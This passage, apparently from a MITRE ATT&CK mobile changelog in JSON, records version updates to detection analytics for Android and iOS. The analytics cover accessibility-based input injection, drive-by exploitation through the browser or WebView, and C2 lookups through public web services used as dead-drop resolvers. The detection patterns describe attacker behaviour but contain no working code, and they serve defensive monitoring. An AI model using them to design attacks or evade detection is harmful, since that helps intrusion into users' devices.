class=\"diff_add\">interface&nbsp;actions&nbsp;occurring&nbsp;on&nbsp;behalf&nbsp;of&nbsp;the&nbsp;user&nbsp;in&nbsp;another</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;foreground&nbsp;application.&nbsp;The&nbsp;strongest&nbsp;Android&nbsp;evidence&nbsp;is&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ccessibility-enabled&nbsp;or&nbsp;similarly&nbsp;privileged&nbsp;app&nbsp;behavior&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">at&nbsp;triggers&nbsp;programmatic&nbsp;clicks,&nbsp;global&nbsp;actions,&nbsp;or&nbsp;text&nbsp;ins</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ertion&nbsp;into&nbsp;another&nbsp;app's&nbsp;active&nbsp;UI,&nbsp;especially&nbsp;when&nbsp;those&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctions&nbsp;occur&nbsp;without&nbsp;matching&nbsp;user&nbsp;touch&nbsp;interaction,&nbsp;while&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">the&nbsp;injecting&nbsp;app&nbsp;is&nbsp;backgrounded&nbsp;or&nbsp;foreground-service-only</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;or&nbsp;when&nbsp;the&nbsp;target&nbsp;foreground&nbsp;app&nbsp;belongs&nbsp;to&nbsp;a&nbsp;sensitive&nbsp;c</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ategory&nbsp;such&nbsp;as&nbsp;banking,&nbsp;payments,&nbsp;identity,&nbsp;communications,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;enterprise&nbsp;access.&nbsp;The&nbsp;detection&nbsp;is&nbsp;strengthened&nbsp;when&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;injected&nbsp;input&nbsp;sequence&nbsp;is&nbsp;followed&nbsp;by&nbsp;target-app&nbsp;navigati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on,&nbsp;form&nbsp;submission,&nbsp;transaction&nbsp;progression,&nbsp;or&nbsp;network&nbsp;act</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ivity&nbsp;from&nbsp;the&nbsp;target&nbsp;context.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--3723c7a3-2ea7-455f-aec5-29300cb7ae64",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-09 17:32:52.483000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0614#AN1669",
                            "external_id": "AN1669"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1669",
                    "description": "A defender correlates navigation to external web content in a browser or embedded WebView with immediate script-heavy or exploit-preparation network activity, followed by abnormal browser/WebView process behavior, suspicious file or download artifacts, or rapid post-visit capability shifts such as new package install attempts, overlay prompts, permission requests, or outbound command traffic inconsistent with normal browsing.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "New permission prompt, package install attempt, accessibility/overlay special access request, or other post-browse capability escalation following browser/WebView activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "NavigationToExploitWindow",
                            "description": "Time window used to correlate web navigation with redirects, fingerprinting, downloads, or post-visit capability changes."
                        },
                        {
                            "field": "AllowedBrowserApps",
                            "description": "Allow-list of expected browsers or sanctioned WebView-hosting apps used in the enterprise."
                        },
                        {
                            "field": "RedirectChainThreshold",
                            "description": "Threshold for suspicious number of redirects or cross-domain hops during a single browsing session."
                        },
                        {
                            "field": "NewDomainBurstThreshold",
                            "description": "Threshold for the number of newly observed domains contacted in a short browsing window."
                        },
                        {
                            "field": "DownloadArtifactThreshold",
                            "description": "Threshold for suspicious downloaded or cached artifacts created after navigation."
                        },
                        {
                            "field": "PostVisitCapabilityShiftRequired",
                            "description": "Determines whether to require a new install/prompt/permission/overlay event after browsing to raise confidence."
                        },
                        {
                            "field": "AllowedAdTechDomains",
                            "description": "Baseline of normal advertising/CDN/tracking domains to reduce false positives from legitimate browsing."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"NavigationToExploitWindow\", \"description\": \"Time window used to correlate web navigation with redirects, fingerprinting, downloads, or post-visit capability changes.\"}, {\"field\": \"AllowedBrowserApps\", \"description\": \"Allow-list of expected browsers or sanctioned WebView-hosting apps used in the enterprise.\"}, {\"field\": \"RedirectChainThreshold\", \"description\": \"Threshold for suspicious number of redirects or cross-domain hops during a single browsing session.\"}, {\"field\": \"NewDomainBurstThreshold\", \"description\": \"Threshold for the number of newly observed domains contacted in a short browsing window.\"}, {\"field\": \"DownloadArtifactThreshold\", \"description\": \"Threshold for suspicious downloaded or cached artifacts created after navigation.\"}, {\"field\": \"PostVisitCapabilityShiftRequired\", \"description\": \"Determines whether to require a new install/prompt/permission/overlay event after browsing to raise confidence.\"}, {\"field\": \"AllowedAdTechDomains\", \"description\": \"Baseline of normal advertising/CDN/tracking domains to reduce false positives from legitimate browsing.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-09 17:32:52.483000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender correlates navigation to external web content in a browser or embedded WebView with immediate script-heavy or exploit-preparation network activity, followed by abnormal browser/WebView process behavior, suspicious file or download artifacts, or rapid post-visit capability shifts such as new package install attempts, overlay prompts, permission requests, or outbound command traffic inconsistent with normal browsing.\", \"old_value\": \"Mobile security products can often alert the user if their device is vulnerable to known exploits.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"New permission prompt, package install attempt, accessibility/overlay special access request, or other post-browse capability escalation following browser/WebView activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to93__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to93__0\"><a href=\"#difflib_chg_to93__top\">t</a></td><td class=\"diff_header\" id=\"from93_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;often&nbsp;alert&nbsp;the&nbsp;user&nbsp;if&nbsp;their&nbsp;d</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to93__top\">t</a></td><td class=\"diff_header\" id=\"to93_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;correlates&nbsp;navigation&nbsp;to&nbsp;external&nbsp;web&nbsp;content&nbsp;in&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">evice&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;known&nbsp;exploits.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a&nbsp;browser&nbsp;or&nbsp;embedded&nbsp;WebView&nbsp;with&nbsp;immediate&nbsp;script-heavy&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;exploit-preparation&nbsp;network&nbsp;activity,&nbsp;followed&nbsp;by&nbsp;abnormal&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">browser/WebView&nbsp;process&nbsp;behavior,&nbsp;suspicious&nbsp;file&nbsp;or&nbsp;downloa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;artifacts,&nbsp;or&nbsp;rapid&nbsp;post-visit&nbsp;capability&nbsp;shifts&nbsp;such&nbsp;as&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ew&nbsp;package&nbsp;install&nbsp;attempts,&nbsp;overlay&nbsp;prompts,&nbsp;permission&nbsp;req</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">uests,&nbsp;or&nbsp;outbound&nbsp;command&nbsp;traffic&nbsp;inconsistent&nbsp;with&nbsp;normal&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">browsing.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--de37eb78-5f35-4327-99d0-ad6546ab0fb6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-09 17:36:14.306000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0614#AN1670",
                            "external_id": "AN1670"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1670",
                    "description": "A defender correlates Safari or embedded web content navigation with short-lived but abnormal web session behavior such as staged redirects, environment fingerprinting, or exploit-preparation fetches, followed by browser/WebView instability, unusual file handling, profile/download prompts, or near-term changes in device or application behavior inconsistent with normal browsing.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Post-browse configuration profile prompt, managed/unmanaged app handoff anomaly, or compliance-relevant state change shortly after browser activity"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "NavigationToExploitWindow",
                            "description": "Time window linking Safari/WebView navigation to redirects, downloads, crashes, or post-visit state changes."
                        },
                        {
                            "field": "AllowedBrowserApps",
                            "description": "Allow-list of expected browsers and sanctioned embedded web container apps."
                        },
                        {
                            "field": "RedirectChainThreshold",
                            "description": "Threshold for suspicious redirect depth or cross-domain chaining."
                        },
                        {
                            "field": "FingerprintingRequestThreshold",
                            "description": "Threshold for suspicious browser/environment enumeration requests during browsing session."
                        },
                        {
                            "field": "DownloadArtifactThreshold",
                            "description": "Threshold for suspicious downloaded files, profiles, or cached artifacts created after page visit."
                        },
                        {
                            "field": "PostVisitBehaviorShiftThreshold",
                            "description": "Threshold for abnormal changes in app/device behavior after browsing, such as repeated browser crashes or unexpected handoffs."
                        },
                        {
                            "field": "AllowedAdTechDomains",
                            "description": "Baseline of expected ad-tech, CDN, and analytics domains to suppress benign browsing noise."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"NavigationToExploitWindow\", \"description\": \"Time window linking Safari/WebView navigation to redirects, downloads, crashes, or post-visit state changes.\"}, {\"field\": \"AllowedBrowserApps\", \"description\": \"Allow-list of expected browsers and sanctioned embedded web container apps.\"}, {\"field\": \"RedirectChainThreshold\", \"description\": \"Threshold for suspicious redirect depth or cross-domain chaining.\"}, {\"field\": \"FingerprintingRequestThreshold\", \"description\": \"Threshold for suspicious browser/environment enumeration requests during browsing session.\"}, {\"field\": \"DownloadArtifactThreshold\", \"description\": \"Threshold for suspicious downloaded files, profiles, or cached artifacts created after page visit.\"}, {\"field\": \"PostVisitBehaviorShiftThreshold\", \"description\": \"Threshold for abnormal changes in app/device behavior after browsing, such as repeated browser crashes or unexpected handoffs.\"}, {\"field\": \"AllowedAdTechDomains\", \"description\": \"Baseline of expected ad-tech, CDN, and analytics domains to suppress benign browsing noise.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-09 17:36:14.306000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A defender correlates Safari or embedded web content navigation with short-lived but abnormal web session behavior such as staged redirects, environment fingerprinting, or exploit-preparation fetches, followed by browser/WebView instability, unusual file handling, profile/download prompts, or near-term changes in device or application behavior inconsistent with normal browsing.\", \"old_value\": \"Mobile security products can often alert the user if their device is vulnerable to known exploits.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Post-browse configuration profile prompt, managed/unmanaged app handoff anomaly, or compliance-relevant state change shortly after browser activity\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to158__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to158__0\"><a href=\"#difflib_chg_to158__top\">t</a></td><td class=\"diff_header\" id=\"from158_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;often&nbsp;alert&nbsp;the&nbsp;user&nbsp;if&nbsp;their&nbsp;d</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to158__top\">t</a></td><td class=\"diff_header\" id=\"to158_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;defender&nbsp;correlates&nbsp;Safari&nbsp;or&nbsp;embedded&nbsp;web&nbsp;content&nbsp;navigat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">evice&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;known&nbsp;exploits.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;with&nbsp;short-lived&nbsp;but&nbsp;abnormal&nbsp;web&nbsp;session&nbsp;behavior&nbsp;such&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">as&nbsp;staged&nbsp;redirects,&nbsp;environment&nbsp;fingerprinting,&nbsp;or&nbsp;exploit-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">preparation&nbsp;fetches,&nbsp;followed&nbsp;by&nbsp;browser/WebView&nbsp;instability</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;unusual&nbsp;file&nbsp;handling,&nbsp;profile/download&nbsp;prompts,&nbsp;or&nbsp;near-t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">erm&nbsp;changes&nbsp;in&nbsp;device&nbsp;or&nbsp;application&nbsp;behavior&nbsp;inconsistent&nbsp;w</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ith&nbsp;normal&nbsp;browsing.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--8503331d-09f5-49d3-838c-f0d3b1d55e30",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-17 20:48:31.295000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0617#AN1675",
                            "external_id": "AN1675"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1675",
                    "description": "The defender correlates an app-attributed request to a legitimate public web platform with a subsequent outbound connection to a newly derived or previously unseen destination within a short time window. The behavior is strengthened when the initial request retrieves structured or encoded content followed by a pivot to a different domain or IP that was not previously contacted by the app, especially when occurring without user interaction, in background state, or immediately after app initialization or scheduled execution. This sequence reflects resolver retrieval followed by dynamic C2 resolution.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "AppState=background or foreground_service active when resolver retrieval request occurred and pivot connection followed without foreground transition"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before resolver retrieval and subsequent pivot connection sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App initiating resolver\u2192pivot sequence was unmanaged or not authorized to communicate with detected web-service class or external infrastructure"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum allowed time between resolver retrieval and pivot connection (e.g., 5\u201360 seconds)."
                        },
                        {
                            "field": "NewDomainThreshold",
                            "description": "Defines what qualifies as a previously unseen or rare destination for the app or device."
                        },
                        {
                            "field": "AllowedServiceToDestinationMapping",
                            "description": "Legitimate mappings between apps and expected downstream services."
                        },
                        {
                            "field": "UserInteractionThreshold",
                            "description": "Defines acceptable delay between user interaction and network activity."
                        },
                        {
                            "field": "PayloadSizeThreshold",
                            "description": "Small resolver responses followed by larger pivot traffic can indicate extraction behavior."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
